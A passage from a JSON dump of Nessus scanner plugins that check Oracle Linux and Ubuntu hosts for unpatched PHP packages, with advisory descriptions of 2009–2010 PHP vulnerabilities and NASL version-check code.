leak flaw was discovered in the PHP var_export() function implementation. If some fatal error occurred during the execution of this function (such as the exhaustion of memory or script execution time limit), part of the function's output was sent to the user as script output, possibly leading to the disclosure of sensitive information. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the way the PHP utf8_decode() function decoded partial multi-byte sequences for some multi-byte encodings, sending them to output without them being escaped. An attacker could use these flaws to perform a cross-site scripting attack. 
(CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient entropy to seed the pseudo-random number generator. A remote attacker could possibly use this flaw to predict values returned by the function, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy during seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the length of the pattern argument. A remote attacker could use this flaw to crash the PHP interpreter where a script used fnmatch() on untrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC extension. A malicious XML-RPC client or server could use this flaw to crash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain backported patches to resolve these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 / 5 : php (ELSA-2010-0919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:php", "p-cpe:/a:oracle:linux:php-bcmath", "p-cpe:/a:oracle:linux:php-cli", "p-cpe:/a:oracle:linux:php-common", "p-cpe:/a:oracle:linux:php-dba", "p-cpe:/a:oracle:linux:php-devel", "p-cpe:/a:oracle:linux:php-domxml", "p-cpe:/a:oracle:linux:php-gd", "p-cpe:/a:oracle:linux:php-imap", "p-cpe:/a:oracle:linux:php-ldap", "p-cpe:/a:oracle:linux:php-mbstring", "p-cpe:/a:oracle:linux:php-mysql", "p-cpe:/a:oracle:linux:php-ncurses", "p-cpe:/a:oracle:linux:php-odbc", "p-cpe:/a:oracle:linux:php-pdo", "p-cpe:/a:oracle:linux:php-pear", 
"p-cpe:/a:oracle:linux:php-pgsql", "p-cpe:/a:oracle:linux:php-snmp", "p-cpe:/a:oracle:linux:php-soap", "p-cpe:/a:oracle:linux:php-xml", "p-cpe:/a:oracle:linux:php-xmlrpc", "cpe:/o:oracle:linux:4", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2010-0919.NASL", "href": "https://www.tenable.com/plugins/nessus/68150", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0919 and \n# Oracle Linux Security Advisory ELSA-2010-0919 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68150);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_bugtraq_id(38430, 38708, 41991, 44605, 44889);\n script_xref(name:\"RHSA\", value:\"2010:0919\");\n\n script_name(english:\"Oracle Linux 4 / 5 : php (ELSA-2010-0919)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0919 :\n\nUpdated php packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user\ninput, a remote attacker could use this flaw to inject an arbitrary\nvariable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export()\nfunction implementation. If some fatal error occurred during the\nexecution of this function (such as the exhaustion of memory or script\nexecution time limit), part of the function's output was sent to the\nuser as script output, possibly leading to the disclosure of sensitive\ninformation. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in\nthe way the PHP utf8_decode() function decoded partial multi-byte\nsequences for some multi-byte encodings, sending them to output\nwithout them being escaped. An attacker could use these flaws to\nperform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient\nentropy to seed the pseudo-random number generator. A remote attacker\ncould possibly use this flaw to predict values returned by the\nfunction, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy\nduring seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the\nlength of the pattern argument. A remote attacker could use this flaw\nto crash the PHP interpreter where a script used fnmatch() on\nuntrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC\nextension. 
A malicious XML-RPC client or server could use this flaw to\ncrash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-November/001749.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-November/001750.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"php-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-devel-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-domxml-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-gd-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-imap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-ldap-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-mbstring-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-mysql-4.3.9-3.31\")) 
flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-ncurses-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-odbc-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-pear-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-pgsql-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-snmp-4.3.9-3.31\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-xmlrpc-4.3.9-3.31\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"php-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-bcmath-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-cli-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-common-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-dba-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-devel-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-gd-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-imap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-ldap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-mbstring-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-mysql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-ncurses-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-odbc-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-pdo-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-pgsql-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-snmp-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-soap-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php-xml-5.1.6-27.el5_5.3\")) flag++;\nif (rpm_check(release:\"EL5\", 
reference:\"php-xmlrpc-5.1.6-27.el5_5.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:32:33", "description": "Auke van Slooten discovered that PHP incorrectly handled certain xmlrpc requests. An attacker could exploit this issue to cause the PHP server to crash, resulting in a denial of service. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-0397)\n\nIt was discovered that the pseudorandom number generator in PHP did not provide the expected entropy. An attacker could exploit this issue to predict values that were intended to be random, such as session cookies. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-1128)\n\nIt was discovered that PHP did not properly handle directory pathnames that lacked a trailing slash character. An attacker could exploit this issue to bypass safe_mode restrictions. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-1129)\n\nGrzegorz Stachowiak discovered that the PHP session extension did not properly handle semicolon characters. An attacker could exploit this issue to bypass safe_mode restrictions. This issue only affected Ubuntu 8.04 LTS, 9.04 and 9.10. (CVE-2010-1130)\n\nStefan Esser discovered that PHP incorrectly decoded remote HTTP chunked encoding streams. An attacker could exploit this issue to cause the PHP server to crash and possibly execute arbitrary code with application privileges. This issue only affected Ubuntu 10.04 LTS.\n(CVE-2010-1866)\n\nMateusz Kocielski discovered that certain PHP SQLite functions incorrectly handled empty SQL queries. 
An attacker could exploit this issue to possibly execute arbitrary code with application privileges.\n(CVE-2010-1868)\n\nMateusz Kocielski discovered that PHP incorrectly handled certain arguments to the fnmatch function. An attacker could exploit this flaw and cause the PHP server to consume all available stack memory, resulting in a denial of service. (CVE-2010-1917)\n\nStefan Esser discovered that PHP incorrectly handled certain strings in the phar extension. An attacker could exploit this flaw to possibly view sensitive information. This issue only affected Ubuntu 10.04 LTS.\n(CVE-2010-2094, CVE-2010-2950)\n\nStefan Esser discovered that PHP incorrectly handled deserialization of SPLObjectStorage objects. A remote attacker could exploit this issue to view sensitive information and possibly execute arbitrary code with application privileges. This issue only affected Ubuntu 8.04 LTS, 9.04, 9.10 and 10.04 LTS. (CVE-2010-2225)\n\nIt was discovered that PHP incorrectly filtered error messages when limits for memory, execution time, or recursion were exceeded. A remote attacker could exploit this issue to possibly view sensitive information. (CVE-2010-2531)\n\nStefan Esser discovered that the PHP session serializer incorrectly handled the PS_UNDEF_MARKER marker. An attacker could exploit this issue to alter arbitrary session variables. (CVE-2010-3065).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2010-09-21T00:00:00", "type": "nessus", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : php5 vulnerabilities (USN-989-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1129", "CVE-2010-1130", "CVE-2010-1866", "CVE-2010-1868", "CVE-2010-1917", "CVE-2010-2094", "CVE-2010-2225", "CVE-2010-2531", "CVE-2010-2950", "CVE-2010-3065"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5filter", "p-cpe:/a:canonical:ubuntu_linux:php-pear", "p-cpe:/a:canonical:ubuntu_linux:php5", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-common", "p-cpe:/a:canonical:ubuntu_linux:php5-curl", "p-cpe:/a:canonical:ubuntu_linux:php5-dbg", "p-cpe:/a:canonical:ubuntu_linux:php5-dev", "p-cpe:/a:canonical:ubuntu_linux:php5-enchant", "p-cpe:/a:canonical:ubuntu_linux:php5-gd", "p-cpe:/a:canonical:ubuntu_linux:php5-gmp", "p-cpe:/a:canonical:ubuntu_linux:php5-intl", "p-cpe:/a:canonical:ubuntu_linux:php5-ldap", "p-cpe:/a:canonical:ubuntu_linux:php5-mhash", "p-cpe:/a:canonical:ubuntu_linux:php5-mysql", "p-cpe:/a:canonical:ubuntu_linux:php5-mysqli", "p-cpe:/a:canonical:ubuntu_linux:php5-odbc", "p-cpe:/a:canonical:ubuntu_linux:php5-pgsql", "p-cpe:/a:canonical:ubuntu_linux:php5-pspell", "p-cpe:/a:canonical:ubuntu_linux:php5-recode", "p-cpe:/a:canonical:ubuntu_linux:php5-snmp", "p-cpe:/a:canonical:ubuntu_linux:php5-sqlite", "p-cpe:/a:canonical:ubuntu_linux:php5-sybase", "p-cpe:/a:canonical:ubuntu_linux:php5-tidy", "p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc", "p-cpe:/a:canonical:ubuntu_linux:php5-xsl", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", 
"cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:9.04", "cpe:/o:canonical:ubuntu_linux:9.10"], "id": "UBUNTU_USN-989-1.NASL", "href": "https://www.tenable.com/plugins/nessus/49306", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-989-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(49306);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:26\");\n\n script_cve_id(\"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1129\", \"CVE-2010-1130\", \"CVE-2010-1866\", \"CVE-2010-1868\", \"CVE-2010-1917\", \"CVE-2010-2094\", \"CVE-2010-2225\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3065\");\n script_bugtraq_id(38182, 38430, 38431, 38708, 39877, 40013, 40173, 40948, 41991);\n script_xref(name:\"USN\", value:\"989-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : php5 vulnerabilities (USN-989-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Auke van Slooten discovered that PHP incorrectly handled certain\nxmlrpc requests. An attacker could exploit this issue to cause the PHP\nserver to crash, resulting in a denial of service. This issue only\naffected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-0397)\n\nIt was discovered that the pseudorandom number generator in PHP did\nnot provide the expected entropy. An attacker could exploit this issue\nto predict values that were intended to be random, such as session\ncookies. 
This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and\n9.10. (CVE-2010-1128)\n\nIt was discovered that PHP did not properly handle directory pathnames\nthat lacked a trailing slash character. An attacker could exploit this\nissue to bypass safe_mode restrictions. This issue only affected\nUbuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-1129)\n\nGrzegorz Stachowiak discovered that the PHP session extension did not\nproperly handle semicolon characters. An attacker could exploit this\nissue to bypass safe_mode restrictions. This issue only affected\nUbuntu 8.04 LTS, 9.04 and 9.10. (CVE-2010-1130)\n\nStefan Esser discovered that PHP incorrectly decoded remote HTTP\nchunked encoding streams. An attacker could exploit this issue to\ncause the PHP server to crash and possibly execute arbitrary code with\napplication privileges. This issue only affected Ubuntu 10.04 LTS.\n(CVE-2010-1866)\n\nMateusz Kocielski discovered that certain PHP SQLite functions\nincorrectly handled empty SQL queries. An attacker could exploit this\nissue to possibly execute arbitrary code with application privileges.\n(CVE-2010-1868)\n\nMateusz Kocielski discovered that PHP incorrectly handled certain\narguments to the fnmatch function. An attacker could exploit this flaw\nand cause the PHP server to consume all available stack memory,\nresulting in a denial of service. (CVE-2010-1917)\n\nStefan Esser discovered that PHP incorrectly handled certain strings\nin the phar extension. An attacker could exploit this flaw to possibly\nview sensitive information. This issue only affected Ubuntu 10.04 LTS.\n(CVE-2010-2094, CVE-2010-2950)\n\nStefan Esser discovered that PHP incorrectly handled deserialization\nof SPLObjectStorage objects. A remote attacker could exploit this\nissue to view sensitive information and possibly execute arbitrary\ncode with application privileges. This issue only affected Ubuntu 8.04\nLTS, 9.04, 9.10 and 10.04 LTS. 
(CVE-2010-2225)\n\nIt was discovered that PHP incorrectly filtered error messages when\nlimits for memory, execution time, or recursion were exceeded. A\nremote attacker could exploit this issue to possibly view sensitive\ninformation. (CVE-2010-2531)\n\nStefan Esser discovered that the PHP session serializer incorrectly\nhandled the PS_UNDEF_MARKER marker. An attacker could exploit this\nissue to alter arbitrary session variables. (CVE-2010-3065).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/989-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xsl\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(6\\.06|8\\.04|9\\.04|9\\.10|10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 9.04 / 9.10 / 10.04\", \"Ubuntu \" + release);\nif ( ! 
